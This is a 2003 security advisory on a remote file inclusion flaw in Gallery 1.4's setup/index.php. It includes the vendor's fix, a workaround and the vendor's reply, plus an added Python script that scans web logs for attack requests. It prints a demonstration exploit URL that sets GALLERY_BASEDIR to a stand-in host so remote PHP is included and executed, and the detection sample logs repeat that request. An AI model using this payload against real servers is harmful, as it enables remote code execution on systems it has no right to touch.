SecurityTracker.com
Category:   Application (Multimedia)  >   Gallery
Vendors:   Gallery Project
(Vendor Issues Fix) Re: Gallery Input Validation Flaw in GALLERY_BASEDIR (Again) Permits Remote Code Execution
SecurityTracker Alert ID:  1007996
SecurityTracker URL:  http://securitytracker.com/id/1007996
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Oct 24 2003
Impact:   Execution of arbitrary code via network
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): 1.4
Description:   An include file vulnerability was reported in Gallery. A remote user can execute arbitrary PHP code on the target system.

It is reported that a remote user can specify a remote location for the GALLERY_BASEDIR variable to cause a PHP file at the remote location to be included and executed on the target system.

A demonstration exploit URL is provided:

http://victim/path_to_gallery/setup/index.php?GALLERY_BASEDIR=http://tester/

The above URL will include and execute the contents of the "http://tester/util.php" file.

[Editor's note: The same flaw, or at least a similar flaw, was reported in July 2002 in Alert ID 1004918 and reportedly fixed in Gallery 1.3.1]

Impact:   A remote user can execute arbitrary PHP code, including operating system commands, on the target system. The code will run with the privileges of the target web server.
Solution:   The vendor has issued a fixed version (1.4-pl2), available at:

http://sf.net/project/showfiles.php?group_id=7130&release_id=184028

Version 1.4.1 (unreleased; build 145) also contains the fix.

For users that do not want to upgrade, the vendor indicates that you can do one of the following steps [quoted]:

1. Delete gallery/setup/index.php. This will also disable the configuration wizard for you until you restore this file or upgrade to a secure release.

2. Open gallery/setup/index.php in a text editor and change the following lines:

    if (!isset($GALLERY_BASEDIR)) {
      $GALLERY_BASEDIR = '../';
    }

to this:

    $GALLERY_BASEDIR = '../';

Vendor URL:  gallery.sourceforge.net/
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any)
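
Detection example (added here; not part of the original alert or the vendor's code): the request described above leaves a recognizable trace in web server access logs, because GALLERY_BASEDIR appears as a query-string parameter. The Python sketch below scans Common/Combined Log Format lines for it. The sample log lines, the addresses in them and the names scan, LOG_RE and SCHEME_RE are constructed for illustration, and it assumes legitimate clients never send this parameter.

```python
import re
from urllib.parse import parse_qsl, urlsplit

PARAM = "GALLERY_BASEDIR"  # variable named in the advisory
# Common/Combined Log Format: client, timestamp, method, request target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')
# Value begins with a URL scheme (http://, ftp://, ...): a non-local include base.
SCHEME_RE = re.compile(r'^\s*[a-z][a-z0-9+.-]*://', re.IGNORECASE)

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [11/Oct/2003:10:01:02 +0000] "GET /gallery/albums.php HTTP/1.0" 200 5120
198.51.100.7 - - [11/Oct/2003:10:02:40 +0000] "GET /gallery/setup/index.php?GALLERY_BASEDIR=http://tester/ HTTP/1.0" 200 812
198.51.100.7 - - [11/Oct/2003:10:02:55 +0000] "GET /gallery/setup/index.php?x=1&GALLERY%5FBASEDIR=hTTp%3A%2F%2Ftester%2F HTTP/1.0" 200 812
192.0.2.33 - - [11/Oct/2003:10:05:00 +0000] "GET /gallery/setup/index.php?GALLERY_BASEDIR=../ HTTP/1.0" 200 4410
"""

def scan(log_text):
    """Return one finding per request that supplies GALLERY_BASEDIR in the query string."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable access-log line
        client, when, method, target, status = m.groups()
        parts = urlsplit(target)
        # parse_qsl percent-decodes names and values once, so encoded forms match too.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name != PARAM:
                continue
            # Assumption: any client-supplied value is suspect; a URL scheme is the worst case.
            kind = "remote-include" if SCHEME_RE.match(value) else "param-override"
            findings.append({"client": client, "time": when, "path": parts.path,
                             "value": value, "kind": kind, "status": int(status)})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['kind']:15} {f['client']:15} {f['path']} -> {f['value']!r} ({f['status']})")
```

A 200 status on a flagged request only shows that setup/index.php is still present; whether the host is fixed depends on the installed version or on the workaround above.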

Message History:   This archive entry is a follow-up to the message listed below.
Oct 11 2003 Gallery Input Validation Flaw in GALLERY_BASEDIR (Again) Permits Remote Code Execution



 Source Message Contents

Subject:  Re: Gallery 1.4 including file vulnerability


...
> -Proof of concept-
> It is possible to include any php file from a remote host, and execute
> it on the target's server.

Thanks for the alert.  It's disappointing that you made absolutely
no effort to contact us before announcing this vulnerability.
Even 12 hours would have let us have a release ready in time for
your announcement and you still would have gotten the credit.

This vulnerability affects a small percentage of Unix gallery users,
as it can only be exploited when Gallery is in the non-functional
"configuration mode".  However, it does expose Windows users to
the exploit.  Only the following versions of Gallery have the bug:
* 1.4
* 1.4-pl1
* 1.4.1 (unreleased; prior to build 145)

The problem has been fixed in:
* 1.4-pl2
  http://sf.net/project/showfiles.php?group_id=7130&release_id=184028
* 1.4.1 (unreleased; build 145)

We strongly recommend that you upgrade to 1.4-pl2 immediately.
However, if you don't want to install the entire 1.4-pl2 update, there
are two simple approaches you can take to secure your system:

1.  Delete gallery/setup/index.php
    This will also disable the configuration wizard for you until you
    restore this file or upgrade to a secure release.

     --or--

2.  Open gallery/setup/index.php in a text editor and change the
    following lines:

        if (!isset($GALLERY_BASEDIR)) {
          $GALLERY_BASEDIR = '../';
        }

    to this:

       $GALLERY_BASEDIR = '../';

    Note that all we are doing is deleting two lines of code.

regards,
Bharat Mediratta
Gallery Development Team

 
 

